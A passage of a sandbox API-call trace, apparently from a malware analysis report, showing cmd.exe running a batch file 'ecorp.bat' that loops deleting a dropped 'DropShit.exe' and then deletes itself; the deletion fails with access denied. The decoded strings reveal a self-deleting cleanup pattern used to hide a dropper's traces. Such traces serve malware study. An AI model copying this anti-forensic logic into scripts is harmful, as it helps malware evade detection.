nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.903] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.903] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.903] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.903] GetFileType (hFile=0x7) returned 0x2 [0091.903] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.903] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.903] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.904] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.904] GetFileType (hFile=0x7) returned 0x2 [0091.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.904] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.904] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.904] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.904] GetFileType (hFile=0x7) returned 0x2 [0091.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.904] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.905] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.905] GetFileType (hFile=0x7) returned 0x2 [0091.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.905] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.906] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.906] GetFileType (hFile=0x7) returned 0x2 [0091.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.906] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.906] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.906] GetFileType (hFile=0x7) returned 0x2 [0091.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.907] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.907] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.907] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.907] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x26cd30 [0091.907] FindClose (in: hFindFile=0x26cd30 | out: hFindFile=0x26cd30) returned 1 [0091.907] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.907] GetProcessHeap () returned 0x250000 [0091.907] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.908] GetProcessHeap () returned 0x250000 [0091.908] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.908] GetProcessHeap () returned 0x250000 [0091.908] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.908] GetProcessHeap () returned 0x250000 [0091.908] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.908] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] GetFileType (hFile=0x5c) returned 0x1 [0091.908] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.908] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.908] GetFileType (hFile=0x5c) returned 0x1 [0091.908] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.908] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.908] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.909] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.909] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.909] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.909] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.909] GetFileType (hFile=0x5c) returned 0x1 [0091.909] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.909] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.909] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.909] _close (_FileHandle=3) returned 0 [0091.909] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.909] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.909] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.909] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.909] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.909] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.910] SetConsoleInputExeNameW () returned 0x1 [0091.910] GetConsoleOutputCP () returned 0x1b5 [0091.910] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.910] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.910] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.910] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.910] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.910] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.910] GetProcessHeap () returned 0x250000 [0091.911] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0091.911] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.911] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.911] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.911] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.911] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.911] GetFileType (hFile=0x5c) returned 0x1 [0091.911] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.911] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.911] GetProcessHeap () returned 0x250000 [0091.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.911] GetProcessHeap () returned 0x250000 [0091.911] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.911] GetProcessHeap () returned 0x250000 [0091.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.911] GetProcessHeap () returned 0x250000 [0091.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.911] GetProcessHeap () returned 0x250000 [0091.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.912] _tell (_FileHandle=3) returned 29 [0091.912] _close (_FileHandle=3) returned 0 [0091.912] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.912] GetFileType (hFile=0x7) returned 0x2 [0091.912] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.912] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.912] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.913] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.913] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.913] GetFileType (hFile=0x7) returned 0x2 [0091.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.913] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.913] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.913] GetFileType (hFile=0x7) returned 0x2 [0091.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.914] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.914] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.914] GetFileType (hFile=0x7) returned 0x2 [0091.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.921] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.922] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.922] GetFileType (hFile=0x7) returned 0x2 [0091.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.922] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.922] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.923] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.923] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.923] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.923] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26ccf0 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26cd30 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26cd30, Size=0x30) returned 0x26cd30 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26cd30) returned 0x30 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.923] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.923] GetProcessHeap () returned 0x250000 [0091.923] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cd70 [0091.923] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.923] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.923] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cdd0 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0091.924] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.924] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.924] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0091.924] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.924] SetErrorMode (uMode=0x0) returned 0x0 [0091.924] SetErrorMode (uMode=0x1) returned 0x0 [0091.924] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.924] SetErrorMode (uMode=0x0) returned 0x1 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0091.924] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.924] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.924] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26ce30 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26f170 [0091.924] GetProcessHeap () returned 0x250000 [0091.924] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f1e0 [0091.924] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f4) returned 0x26cea0 [0091.925] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.925] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.925] GetLastError () returned 0x5 [0091.925] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.925] GetFileType (hFile=0x7) returned 0x2 [0091.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.926] _get_osfhandle (_FileHandle=2) returned 0xb [0091.926] GetFileType (hFile=0xb) returned 0x2 [0091.926] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.926] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.926] _get_osfhandle (_FileHandle=2) returned 0xb [0091.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.927] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.927] FormatMessageW (in: dwFlags=0x1800, 